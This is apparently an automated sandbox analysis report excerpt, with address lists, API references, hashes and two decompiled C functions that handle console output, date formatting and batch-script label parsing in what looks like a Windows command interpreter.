0x00344a5e
0x00344a61
0x00344a64
0x00344a71
0x00344a7b
0x0034ea7b
0x00000000
0x00000000
0x0034ea81
0x0034ea82
0x00000000
0x0034ea82
0x00344a87
0x00344a9d
0x00344a9d
0x00344aa2
0x0034e9ef
0x0034e9ef
0x00344aa8
0x00344aad
0x00344ab3
0x00344ab5
0x00344abd
0x00344b53
0x00344b53
0x00344ac3
0x00344ac8
0x00344acb
0x00344ad4
0x0034e9fe
0x0034ea08
0x0034ea52
0x0034ea55
0x00000000
0x0034ea55
0x0034ea0c
0x0034ea12
0x0034ea16
0x00000000
0x00000000
0x0034ea28
0x0034ea2e
0x0034ea33
0x0034ea38
0x0034ea3e
0x0034ea41
0x0034ea43
0x0034ea46
0x00000000
0x00344ada
0x00344adc
0x00344ae1
0x00344ae7
0x00344aea
0x00344aed
0x00344aed
0x00344af0
0x00344af3
0x00344af9
0x00344aff
0x00344b00
0x00344b03
0x00344b09
0x00344b12
0x00000000
0x00000000
0x003448fc
0x003448fc
0x003448fe
0x00344900
0x00344906
0x00344909
0x00344909
0x0034490c
0x0034490f
0x00344918
0x0034491a
0x0034491f
0x00344927
0x00344937
0x00344941
0x00344944
0x00344946
0x00344955
0x00344957
0x00344957
0x0034495c
0x0034495e
0x00344964
0x00344969
0x00344972
0x003449bc
0x003449c4
0x00000000
0x00000000
0x00000000
0x00344974
0x0034497b
0x00000000
0x00000000
0x0034497d
0x0034497e
0x00000000
0x0034497e
0x00344972
0x00344929
0x00344931
0x0034ea67
0x00000000
0x00000000
0x0034ea6d
0x0034ea6e
0x00000000
0x0034ea6e
0x00000000
0x00344931
0x00344ad4
0x00344a89
0x00344a8e
0x00344b1d
0x00344b22
0x00344b4b
0x00344b4b
0x00344b24
0x00344b27
0x00344b27
0x00344b2a
0x00344b2d
0x00344b3d
0x00344b40
0x0034e9ca
0x0034e9e5
0x0034e9e5
0x0034e9ca
0x00344b40
0x00000000
0x00344a8e
0x00344a0f
0x0034e967
0x0034e96b
0x0034e96d
0x0034e96d
0x0034e97c
0x0034e99a
0x00000000
0x0034e97e
0x0034e980
0x0034e982
0x0034e982
0x0034e988
0x0034e990
0x00000000
0x0034e990
0x0034e97c
0x00344a15
0x00344a17
0x0034e9a5
0x0034e9a5
0x00344a1f
0x00000000
0x00344a1f
0x003448d1
0x003448d9
0x003448db
0x003448dc
0x003448de
0x003448e1
0x003448e4
0x003448e7
0x003448ed
0x003448f6
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00344861
memset.MSVCRT ref: 00344881

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

??_V@YAXPAX@Z.MSVCRT ref: 00344991
??_V@YAXPAX@Z.MSVCRT ref: 0034499E
longjmp.MSVCRT(0036B8B8,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 0034E94C

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$Heap$AllocProcesslongjmp
String ID:
API String ID: 2656838167-0
Opcode ID: 448ca88f43881b1d81177180837a876589d56fffda319eafcab0a284754de603
Instruction ID: 9004620abb4a4136dd46f90a5125adbe49824876080f8e04e918f77db999a7d3
Opcode Fuzzy Hash: 448ca88f43881b1d81177180837a876589d56fffda319eafcab0a284754de603
Instruction Fuzzy Hash: 3BD1AE70A002158BDB3ACF14C891BAAB7F4BF44704F5540EDEA4AAF291DB70BE81CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0033B6CB, Relevance: 9.2, APIs: 6, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0033B6CB(void** __ecx, intOrPtr _a8) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				void** _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t96;
				void* _t97;
				void* _t103;
				intOrPtr _t114;
				void* _t115;
				void** _t121;
				void** _t122;
				void* _t125;
				void* _t126;
				void* _t135;
				void* _t136;
				signed short _t143;
				long _t153;
				short* _t155;
				void* _t161;
				signed int _t164;
				void* _t168;
				void _t170;
				void _t174;
				intOrPtr _t184;
				void* _t187;
				void* _t192;
				void** _t193;
				signed int _t195;
				signed int _t204;
				int _t207;
				void** _t215;
				void** _t216;
				signed int _t224;
				signed int _t228;
				void* _t229;
				void* _t232;
				void* _t238;
				void* _t240;
				intOrPtr _t248;
				signed int _t253;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t263;
				void* _t264;
				signed int _t265;
				void* _t266;

				_t193 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t97 = E0034269C(_t96);
					_t260 =  *(__ecx + 0x10);
					if(_t97 == 0) {
						if(E003427C8( *(__ecx + 8) +  *(__ecx + 8), _t260,  *(__ecx + 8) +  *(__ecx + 8),  &_v20) == 0) {
							goto L59;
						} else {
							_t179 =  *(__ecx + 8);
							_t101 =  *(__ecx + 8) + _t179;
							if(_v20 >=  *(__ecx + 8) + _t179) {
								goto L35;
							} else {
								goto L59;
							}
						}
					} else {
						_t184 = _t260 +  *(__ecx + 8) * 2;
						_v12 = _t184;
						if(_t260 < _t184) {
							_t238 = 0x2022;
							while(1) {
								_t259 = _t260;
								if(_t260 >= _t184) {
									goto L35;
								}
								while( *_t259 != _t238) {
									_t259 = _t259 + 2;
									if(_t259 < _t184) {
										continue;
									}
									break;
								}
								if(_t259 == _t260) {
									goto L48;
								} else {
									_t192 = _t259 - _t260 >> 1;
									_v16 = _t192;
									__imp___get_osfhandle(0);
									if(WriteConsoleW(_t192, 1, _t260, _t192,  &_v8) == 0) {
										L59:
										_t202 = 1;
										if(E00340178(_t101) == 0) {
											_t202 = 1;
											_t103 = E00359953(_t102, 1);
											if(_t103 == 0) {
												_push(_t103);
												_push(0x70);
												goto L63;
											}
										} else {
											_push(0);
											_push(0x1d);
											L63:
											E0033C5A2(_t202);
											_pop(_t202);
										}
										E00359287(_t202);
										__imp__longjmp(0x36b8b8, 1);
										asm("int3");
										_t204 = 9;
										memcpy( &_v420, _t260, _t204 << 2);
										_t266 = _t266 + 0xc;
										E00353C49( &_v420,  &_v376);
										FileTimeToLocalFileTime( &_v376,  &_v384);
										FileTimeToSystemTime( &_v384,  &_v348);
										_v352 = 0;
										if( *0x373cc9 == 0) {
											_t245 = _v348 & 0x0000ffff;
											_t261 = _v346 & 0x0000ffff;
											_t258 = _v342 & 0x0000ffff;
											_v352 = _t245;
											if(_v364 == 0) {
												_t224 = 0x64;
												_t245 = _t245 % _t224;
												_v352 = _t245;
											}
											_t114 =  *0x35d540; // 0x0
											if(_t114 != 2) {
												if(_t114 == 1) {
													_t135 = _t261;
													_t261 = _t258;
													_t258 = _t135;
												}
											} else {
												_t136 = _t245;
												_t245 = _t258;
												_t258 = _t261;
												_v352 = _t245;
												_t261 = _t136;
											}
											_t207 =  *0x35d598; // 0x0
											if(_t207 >= 0x20) {
												_t115 =  *0x35d594; // 0x0
												goto L92;
											} else {
												_t115 = realloc( *0x35d594, 0x40);
												_pop(0);
												if(_t115 != 0) {
													_t245 = _v352;
													_t207 = 0x20;
													 *0x35d594 = _t115;
													 *0x35d598 = _t207;
													L92:
													_push(_t245);
													_push(0x35f80c);
													_push(_t258);
													_push(0x35f80c);
													E0034274C(_t115, _t207, L"%02d%s%02d%s%02d", _t261);
													_t266 = _t266 + 0x20;
													_t258 = 2;
													goto L34;
												} else {
													_push(_t115);
													goto L79;
												}
											}
										} else {
											_v356 = 0;
											if(GetLocaleInfoW(E003441A4(), 0x1f,  &_v332, 0x80) == 0) {
												_t245 = 0x80;
												E00341040( &_v332, 0x80,  *0x35f7f8);
											}
											_t143 = _v332;
											_t263 =  &_v332;
											_t258 = 2;
											if(_t143 != 0) {
												_t195 = _v356;
												_t228 = _t143 & 0x0000ffff;
												_t161 = 0x64;
												do {
													if(_t228 == 0x27) {
														_t263 = _t263 + _t258;
														_t195 = 0 | _t195 == 0x00000000;
													} else {
														if(_t195 != 0 || _t228 != _t161 && _t228 != 0x4d) {
															_t263 = _t263 + _t258;
														} else {
															_t253 = 0;
															do {
																_t263 = _t263 + _t258;
																_t253 = 1 + _t253;
															} while ( *_t263 == _t228);
															_v356 = _t263;
															_t264 = _t263 +  ~_t253 * 2;
															if(_t253 != 1) {
																_t168 = 0x64;
																if(_t228 == _t168) {
																	_v360 = 0;
																}
																if(_t253 <= 3) {
																	_t263 = _v356;
																} else {
																	_t245 = _v356;
																	_t229 = _t245;
																	_v356 = _t229 + 2;
																	do {
																		_t170 =  *_t229;
																		_t229 = _t229 + _t258;
																	} while (_t170 != _v352);
																	_t263 = _t264 + 6;
																	memmove(_t263, _t245, 2 + (_t229 - _v356 >> 1) * 2);
																	_t266 = _t266 + 0xc;
																}
															} else {
																_t232 = _t264;
																_t245 = _t232 + 2;
																do {
																	_t174 =  *_t232;
																	_t232 = _t232 + _t258;
																} while (_t174 != _v352);
																memmove(_t264 + 2, _t264, 2 + (_t232 - _t245 >> 1) * 2);
																_t266 = _t266 + 0xc;
																_t263 = _t264 + 4;
															}
														}
													}
													_t164 =  *_t263 & 0x0000ffff;
													_t228 = _t164;
													_t161 = 0x64;
												} while (_t164 != 0);
												_t193 = _v368;
											}
											if(GetDateFormatW(E003441A4(), 0,  &_v348,  &_v332,  *0x35d594,  *0x35d598) == 0) {
												L31:
												_t261 = GetDateFormatW(E003441A4(), 0,  &_v348,  &_v332, 0, 0);
												if(_t261 == 0) {
													_t153 = GetLastError();
													_push(0);
													goto L77;
												} else {
													_t261 = _t261 + 1;
													_t155 = realloc( *0x35d594, _t261 + _t261);
													_pop(0);
													if(_t155 == 0) {
														_push(0);
														L79:
														_push(8);
														goto L80;
													} else {
														 *0x35d594 = _t155;
														 *0x35d598 = _t261;
														_t261 = 0;
														if(GetDateFormatW(E003441A4(), 0,  &_v348,  &_v332, _t155, 0) == 0) {
															_t153 = GetLastError();
															_push(0);
															L77:
															 *0x373cf0 = _t153;
															_push(_t153);
															L80:
															E0033C5A2(0);
															_t122 = 0;
														} else {
															L34:
															_t261 =  *0x35d594; // 0x0
															goto L14;
														}
													}
												}
											} else {
												_t261 =  *0x35d594; // 0x0
												if(_t261 == 0) {
													goto L31;
												} else {
													L14:
													_push(E00335AA7(_v344 & 0x0000ffff));
													_t245 = 0x20;
													E00341040( &_v76, _t245);
													if(_t193 == 0) {
														if(_v360 != 0) {
															if(E003368B5() == 0) {
																_push(_t261);
																_push( &_v76);
															} else {
																_push( &_v76);
																_push(_t261);
															}
															_t121 = E003425D9(L"%s %s ");
														} else {
															_push(_t261);
															_t121 = E003425D9(L"%s ");
														}
														_t193 = _t121;
													} else {
														if(_v360 == 0 || _v364 != 1) {
															E00341040(_t193, _a8, _t261);
														} else {
															_t126 = E003368B5();
															_t248 = _a8;
															_t216 = _t193;
															if(_t126 != 0) {
																E00341040(_t216, _t248, _t261);
																E003418C0(_t193, _a8, " ");
																_push( &_v76);
															} else {
																E00341040(_t216, _t248,  &_v76);
																E003418C0(_t193, _a8, " ");
																_push(_t261);
															}
															E003418C0(_t193, _a8);
														}
														_t215 =  &(_t193[0]);
														_t245 = 0;
														do {
															_t125 =  *_t193;
															_t193 = _t193 + _t258;
														} while (_t125 != 0);
														_t193 = _t193 - _t215 >> 1;
													}
													_t122 = _t193;
												}
											}
										}
										return E00346FD0(_t122, _t193, _v8 ^ _t265, _t245, _t258, _t261);
									} else {
										_t101 = _v16;
										if(_v8 != _v16) {
											goto L59;
										} else {
											_t184 = _v12;
											_t260 = _t259;
											_t238 = 0x2022;
											L48:
											while(_t259 < _t184) {
												if( *_t259 == _t238) {
													_t259 = _t259 + 2;
													continue;
												}
												break;
											}
											if(_t259 == _t260) {
												L55:
												_t238 = 0x2022;
												if(_t260 < _t184) {
													continue;
												} else {
													goto L35;
												}
											} else {
												if( *_t193 != 0) {
													SetConsoleMode( *_t193, 2);
												}
												_t187 = _t259 - _t260 >> 1;
												_v16 = _t187;
												__imp___get_osfhandle(_t260, _t187,  &_v8, 0);
												_t240 = 1;
												_t260 = WriteConsoleW(_t187, ??, ??, ??, ??);
												_t101 = E003406C0(_t240);
												if(_t260 == 0) {
													goto L59;
												} else {
													_t101 = _v16;
													if(_v8 != _v16) {
														goto L59;
													} else {
														_t184 = _v12;
														_t260 = _t259;
														goto L55;
													}
												}
											}
										}
									}
								}
								goto L102;
							}
						}
						goto L35;
					}
				} else {
					L35:
					_t193[1] = _t193[1] + E0033BED7(_t193, _t193[4]);
					 *(_t193[4]) = 0;
					_t193[2] = _t193[2] & 0;
					return 0;
				}
				L102:
			}

0x0033b6d4
0x0033b6dc
0x00349996
0x0034999b
0x003499a0
0x00349a97
0x00000000
0x00349a99
0x00349a99
0x00349a9c
0x00349aa1
0x00000000
0x00000000
0x00000000
0x00000000
0x00349aa1
0x003499a6
0x003499a9
0x003499ac
0x003499b1
0x003499b7
0x003499bc
0x003499bc
0x003499c0
0x00000000
0x00000000
0x003499c6
0x003499cb
0x003499d0
0x00000000
0x00000000
0x00000000
0x003499d0
0x003499d4
0x00000000
0x003499d6
0x003499e0
0x003499e6
0x003499e9
0x003499f9
0x00349aa7
0x00349aa9
0x00349ab1
0x00349abb
0x00349abc
0x00349ac3
0x00349ac5
0x00349ac6
0x00000000
0x00349ac6
0x00349ab3
0x00349ab3
0x00349ab5
0x00349ac8
0x00349ac8
0x00349ace
0x00349ace
0x00349acf
0x00349adb
0x00349ae1
0x00349ae4
0x00349aeb
0x00349aeb
0x00349af9
0x00335b59
0x00335b6d
0x00335b75
0x00335b81
0x00349bba
0x00349bc1
0x00349bc8
0x00349bcf
0x00349bdb
0x00349be3
0x00349be4
0x00349be6
0x00349be6
0x00349bec
0x00349bf4
0x00349c09
0x00349c0b
0x00349c0d
0x00349c0f
0x00349c0f
0x00349bf6
0x00349bf6
0x00349bf8
0x00349bfa
0x00349bfc
0x00349c02
0x00349c02
0x00349c11
0x00349c1a
0x00349c4c
0x00000000
0x00349c1c
0x00349c24
0x00349c2b
0x00349c2e
0x00349c36
0x00349c3e
0x00349c3f
0x00349c44
0x00349c51
0x00349c51
0x00349c57
0x00349c58
0x00349c59
0x00349c62
0x00349c67
0x00349c6c
0x00000000
0x00349c30
0x00349c30
0x00000000
0x00349c30
0x00349c2e
0x00335b87
0x00335b87
0x00335baa
0x00349b09
0x00349b11
0x00349b11
0x00335bb0
0x00335bb7
0x00335bbf
0x00335bc3
0x00335bc5
0x00335bcd
0x00335bd0
0x00335bd1
0x00335bd5
0x00349b1d
0x00349b24
0x00335bdb
0x00335bdd
0x00335bf2
0x00335cdd
0x00335cdf
0x00335ce1
0x00335ce1
0x00335ce3
0x00335ce4
0x00335ceb
0x00335cf3
0x00335cf9
0x00349b2d
0x00349b31
0x00349b35
0x00349b35
0x00349b3e
0x00349b82
0x00349b40
0x00349b40
0x00349b46
0x00349b4b
0x00349b51
0x00349b51
0x00349b54
0x00349b56
0x00349b65
0x00349b74
0x00349b7a
0x00349b7a
0x00335cff
0x00335cff
0x00335d01
0x00335d04
0x00335d04
0x00335d07
0x00335d09
0x00335d23
0x00335d29
0x00335d2c
0x00335d2c
0x00335cf9
0x00335bdd
0x00335bf4
0x00335bf9
0x00335bfe
0x00335bfe
0x00335c01
0x00335c01
0x00335c32
0x00335d34
0x00335d53
0x00335d57
0x00349b8d
0x00349b95
0x00000000
0x00335d5d
0x00335d5d
0x00335d68
0x00335d6f
0x00335d72
0x00349ba9
0x00349baa
0x00349baa
0x00000000
0x00335d78
0x00335d7a
0x00335d8c
0x00335d93
0x00335da4
0x00349b98
0x00349b9e
0x00349b9f
0x00349b9f
0x00349ba4
0x00349bac
0x00349bac
0x00349bb3
0x00335daa
0x00335daa
0x00335daa
0x00000000
0x00335daa
0x00335da4
0x00335d72
0x00335c38
0x00335c38
0x00335c40
0x00000000
0x00335c46
0x00335c46
0x00335c52
0x00335c55
0x00335c59
0x00335c60
0x00349c79
0x00349c94
0x00349c9a
0x00349c9b
0x00349c96
0x00349c96
0x00349c97
0x00349c97
0x00349ca1
0x00349c7b
0x00349c7b
0x00349c81
0x00349c87
0x00349ca9
0x00335c66
0x00335c6d
0x00349cd4
0x00335c80
0x00335c80
0x00335c85
0x00335c88
0x00335c8c
0x00349cb1
0x00349cc0
0x00349cc8
0x00335c92
0x00335c96
0x00335ca5
0x00335caa
0x00335caa
0x00335cb0
0x00335cb0
0x00335cb5
0x00335cb8
0x00335cba
0x00335cba
0x00335cbd
0x00335cbf
0x00335cc6
0x00335cc6
0x00335cc8
0x00335cc8
0x00335c40
0x00335c32
0x00335cda
0x003499ff
0x003499ff
0x00349a05
0x00000000
0x00349a0b
0x00349a0b
0x00349a0e
0x00349a10
0x00000000
0x00349a1f
0x00349a1a
0x00349a1c
0x00000000
0x00349a1c
0x00000000
0x00349a1a
0x00349a25
0x00349a6f
0x00349a6f
0x00349a76
0x00000000
0x00349a7c
0x00000000
0x00349a7c
0x00349a27
0x00349a2a
0x00349a30
0x00349a30
0x00349a40
0x00349a46
0x00349a49
0x00349a4f
0x00349a57
0x00349a59
0x00349a60
0x00000000
0x00349a62
0x00349a62
0x00349a68
0x00000000
0x00349a6a
0x00349a6a
0x00349a6d
0x00000000
0x00349a6d
0x00349a68
0x00349a60
0x00349a25
0x00349a05
0x003499f9
0x00000000
0x003499d4
0x003499bc
0x00000000
0x003499b1
0x0033b6e2
0x0033b6e2
0x0033b6ec
0x0033b6f6
0x0033b6f9
0x0033b702
0x0033b702
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 003499E9
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 003499F1
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 00349A30
_get_osfhandle.MSVCRT ref: 00349A49
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00349A51

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Console$Write_get_osfhandle$Mode
String ID:
API String ID: 1066134489-0
Opcode ID: c8e07d400dd56585562def2835d9a9c77b067235e9b8f1ea0e860c1ea2479b38
Instruction ID: 81624c2d221381e0423cc403ac2fa2ddc9ba66489c1423c5e723a52b3fbbb835
Opcode Fuzzy Hash: c8e07d400dd56585562def2835d9a9c77b067235e9b8f1ea0e860c1ea2479b38
Instruction Fuzzy Hash: 42419F31A102159BDF269A78C88ABAFB3E9EB40305F15456BE906DF181EB74ED40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0033E5A8, Relevance: 9.1, APIs: 6, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0033E5A8(struct HINSTANCE__** __ebx, struct HINSTANCE__* __edx, intOrPtr __edi, void* __ebp, void* _a4, intOrPtr _a8, struct HINSTANCE__* _a12, struct HINSTANCE__* _a16, struct HINSTANCE__* _a20, struct HINSTANCE__* _a24, struct HINSTANCE__* _a28, void _a32, void* _a536, intOrPtr _a544, void* _a548, int _a552, char _a556, int _a560, signed int _a572) {
				void* _v0;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t59;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t64;
				struct HINSTANCE__ _t66;
				int _t69;
				int _t74;
				struct HINSTANCE__* _t76;
				struct HINSTANCE__* _t83;
				struct HINSTANCE__* _t84;
				void* _t85;
				struct HINSTANCE__* _t86;
				struct HINSTANCE__* _t87;
				struct HINSTANCE__* _t88;
				struct HINSTANCE__* _t100;
				struct HINSTANCE__** _t102;
				void* _t103;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__ _t114;
				intOrPtr _t132;
				struct HINSTANCE__* _t133;
				void* _t134;
				void* _t135;
				struct HINSTANCE__* _t136;
				struct HINSTANCE__* _t137;
				signed int _t140;
				void* _t142;

				_t132 = __edi;
				_t126 = __edx;
				_t102 = __ebx;
				goto L1;
				L33:
				__eflags =  *((short*)( *((intOrPtr*)(_t126 + 0x38)))) - 0x3a;
				if( *((short*)( *((intOrPtr*)(_t126 + 0x38)))) != 0x3a) {
					goto L4;
				}
				_t136 = E003400B0(0x50);
				__eflags = _t136;
				if(_t136 == 0) {
					L73:
					_t57 = 1;
					L32:
					_pop(_t134);
					_pop(_t135);
					_pop(_t103);
					__eflags = _a572 ^ _t140;
					return E00346FD0(_t57, _t103, _a572 ^ _t140, _t126, _t134, _t135);
				}
				_t136->i = 0;
				_t63 = E0033DF40(L"GOTO");
				 *(_t136 + 0x38) = _t63;
				__eflags = _t63;
				if(_t63 == 0) {
					goto L73;
				}
				_t64 = E0033DF40( *((intOrPtr*)(_a24 + 0x38)));
				 *(_t136 + 0x3c) = _t64;
				__eflags = _t64;
				if(_t64 == 0) {
					goto L73;
				}
				_t126 = 1;
				_t64->i = 0x20;
				 *(_t136 + 0x40) = 0;
				_a28 = 1;
				L13:
				if(_t132 != 0) {
					__eflags = _t136;
					if(_t136 != 0) {
						_a20 = 0;
					}
				}
				_t114 = _t136->i;
				if(_t114 != 0 ||  *( *(_t136 + 0x38)) != 0x3a) {
					if(_t126 != 0) {
						_a28 = 0;
						_t66 = _t114;
					} else {
						_t66 = _t114;
						if( *0x35d0c8 == 1) {
							_t66 = _t114;
							__eflags = _t114 - 0x3b;
							if(_t114 != 0x3b) {
								__eflags =  *0x378530;
								_t66 = _t114;
								if( *0x378530 == 0) {
									E00356FF0(_t114);
									_t126 = 0;
									E00352ED0(_t136, 0);
									E003425D9(L"\r\n");
									_t66 = _t136->i;
									_t140 = _t140 + 4;
								}
							}
						}
					}
					if(_t66 == 0x3b) {
						_t136 =  *(_t136 + 0x38);
					}
					_a552 = 0;
					_a556 = 1;
					_a560 = 0x104;
					memset( &_a32, 0, 0x104);
					_t140 = _t140 + 0xc;
					if(_a556 == 0) {
						_t69 = 0x104;
					} else {
						_t69 = 0x7fe7;
					}
					if(E00340C70( &_a32, _t69) < 0) {
						E00340DE8(_t70,  &_a32);
						goto L73;
					} else {
						if(_t136 == 0) {
							_t136 = 0;
							_a16 = 0;
							L28:
							__imp__??_V@YAXPAX@Z(_a552);
							_t140 = _t140 + 4;
							goto L29;
						}
						if( *_t136 != 0 || E0033DFC0(0x2a,  *(_t136 + 0x38),  &_a16) != 0xffffffff) {
							L25:
							_t126 = _t136;
							_a16 = E00340E00(2, _t136);
							E003406C0(2);
							_t74 = GetConsoleOutputCP();
							 *0x363854 = _t74;
							GetCPInfo(_t74, 0x363840);
							_t137 =  *0x35d5f8; // 0x0
							if(_t137 == 0) {
								_t76 =  *0x35d0d0; // 0xffffffff
								__eflags = _t76 - 0xffffffff;
								if(_t76 != 0xffffffff) {
									L67:
									__eflags = _t76;
									if(_t76 != 0) {
										_t137 = GetProcAddress(_t76, "SetThreadUILanguage");
										 *0x35d5f8 = _t137;
									}
									L69:
									__eflags = _t137;
									if(_t137 != 0) {
										goto L26;
									}
									SetThreadLocale(0x409);
									L27:
									_t136 = _a12;
									goto L28;
								}
								_t76 = GetModuleHandleW(L"KERNEL32.DLL");
								_t137 =  *0x35d5f8; // 0x0
								 *0x35d0d0 = _t76;
								__eflags = _t76 - 0xffffffff;
								if(_t76 == 0xffffffff) {
									goto L69;
								}
								goto L67;
							}
							L26:
							 *0x3794b4(0);
							_t137->i();
							goto L27;
						} else {
							_t83 = E0033D7D4( *(_t136 + 0x38), 0x2a);
							__eflags = _t83;
							if(_t83 != 0) {
								goto L25;
							}
							_t39 = _t83 + 0x3f; // 0x3f
							_t84 = E0033D7D4( *(_t136 + 0x38), _t39);
							__eflags = _t84;
							if(_t84 != 0) {
								goto L25;
							}
							_t131 = _a552;
							__eflags = _a552;
							if(__eflags == 0) {
								_t131 =  &_a32;
							}
							_t85 = E003410B0(_t136, _t131, __eflags, _a560);
							__eflags = _t85 - 2;
							if(_t85 != 2) {
								goto L25;
							} else {
								__eflags =  *(_t136 + 0x34);
								if( *(_t136 + 0x34) == 0) {
									L61:
									_t86 = _a552;
									__eflags = _t86;
									if(__eflags == 0) {
										_t86 =  &_a32;
									}
									_t126 =  *_t102;
									_push(_t86);
									_push(_t102[1]);
									_t87 = E00341F52(_t102, _t136,  *_t102, _t132, _t136, __eflags);
									__eflags = _t87;
									if(_t87 != 0) {
										goto L71;
									} else {
										_t136 = 0;
										_a12 = 1;
										_a8 = 0;
										goto L28;
									}
								} else {
									_t126 = _t136;
									_t88 = E003576C0(_a24, _t136);
									__eflags = _t88;
									if(_t88 != 0) {
										L71:
										__imp__??_V@YAXPAX@Z(_a544);
										_t140 = _t140 + 4;
										_t57 = 1;
										goto L32;
									}
									goto L61;
								}
							}
						}
					}
				} else {
					L41:
					_t136 = _a16;
					L29:
					if( *0x373cc4 != _t102) {
						L78:
						_t57 = _t136;
						goto L32;
					} else {
						_t132 = _a20;
						_t126 = _a24;
						L1:
						if( *0x35d544 != 0) {
							E0035921A(_t102, _t132);
							_t126 = _a24;
						}
						 *0x35d590 = 0;
						if( *0x373cc9 == 0 || _t132 == 0) {
							goto L4;
						} else {
							goto L33;
						}
					}
				}
				L4:
				_t133 = E00340662(_t102);
				if(_t133 == 0xffffffff) {
					goto L73;
				}
				_t59 = E0033EEF0(3, _t133, _t102[4]);
				_t136 = _t59;
				__imp___tell(_t133);
				_t102[2] = _t59;
				_t142 = _t140 + 4;
				_t3 = _t133 - 3; // -3
				_t108 = 0;
				_t126 = _t133;
				if(_t3 > 0x5b) {
					L8:
					__imp___close(_t133);
					_t140 = _t142 + 4;
					if(_t136 == 0) {
						goto L41;
					}
					if(_t136 == 1 ||  *0x36f980 == 0x234a) {
						E003582EB(_t108);
						__eflags =  *0x35d0c8 - 1;
						if( *0x35d0c8 == 1) {
							__eflags =  *0x378530;
							if( *0x378530 == 0) {
								E00356FF0(_t108);
								E0033C108(_t108, 0x2371, 1, 0x363892);
								_t140 = _t140 + 0xc;
							}
						}
						E00359287(_t108);
						__imp__longjmp(0x36b8b8, 1);
						goto L78;
					} else {
						if(_t136 == 0xffffffff) {
							_t57 = _a16;
							goto L32;
						} else {
							_t132 = _a20;
							_t126 = _a28;
							goto L13;
						}
					}
				}
				if(_t133 > 0x1f) {
					_t44 = _t133 - 0x20; // -32
					_t100 = 1 + (_t44 >> 5);
					__eflags = _t100;
					_t108 = _t100;
					do {
						_t126 = _t126 - 0x20;
						_t100 = _t100 - 1;
						__eflags = _t100;
					} while (_t100 != 0);
				}
				asm("btr eax, edx");
				goto L8;
			}

0x0033e5a8
0x0033e5a8
0x0033e5a8
0x0033e5a8
0x0033e7ad
0x0033e7b0
0x0033e7b4
0x00000000
0x00000000
0x0033e7c4
0x0033e7c6
0x0033e7c8
0x0034bfc5
0x0034bfc5
0x0033e798
0x0033e79f
0x0033e7a0
0x0033e7a1
0x0033e7a2
0x0033e7ac
0x0033e7ac
0x0033e7d3
0x0033e7d9
0x0033e7de
0x0033e7e1
0x0033e7e3
0x00000000
0x00000000
0x0033e7f0
0x0033e7f5
0x0033e7f8
0x0033e7fa
0x00000000
0x00000000
0x0033e805
0x0033e80a
0x0033e80d
0x0033e814
0x0033e667
0x0033e669
0x0033e81d
0x0033e81f
0x0033e827
0x0033e827
0x0033e81f
0x0033e66f
0x0033e673
0x0033e684
0x0033e832
0x0033e836
0x0033e68a
0x0033e691
0x0033e693
0x0033e89d
0x0033e89f
0x0033e8a2
0x0034bebb
0x0034bec2
0x0034bec4
0x0034beca
0x0034becf
0x0034bed3
0x0034bedd
0x0034bee2
0x0034bee4
0x0034bee4
0x0034bec4
0x0033e8a2
0x0033e693
0x0033e69c
0x0033e846
0x0033e846
0x0033e6ab
0x0033e6b9
0x0033e6c1
0x0033e6cc
0x0033e6d1
0x0033e6dc
0x0034beec
0x0033e6e2
0x0033e6e2
0x0033e6e2
0x0033e6f3
0x0034bfc0
0x00000000
0x0033e6f9
0x0033e6fb
0x0034bef6
0x0034bef8
0x0033e76b
0x0033e772
0x0033e778
0x00000000
0x0033e778
0x0033e704
0x0033e721
0x0033e721
0x0033e72d
0x0033e731
0x0033e736
0x0033e742
0x0033e747
0x0033e74d
0x0033e755
0x0034bf4d
0x0034bf52
0x0034bf55
0x0034bf72
0x0034bf72
0x0034bf74
0x0034bf82
0x0034bf84
0x0034bf84
0x0034bf8a
0x0034bf8a
0x0034bf8c
0x00000000
0x00000000
0x0034bf97
0x0033e767
0x0033e767
0x00000000
0x0033e767
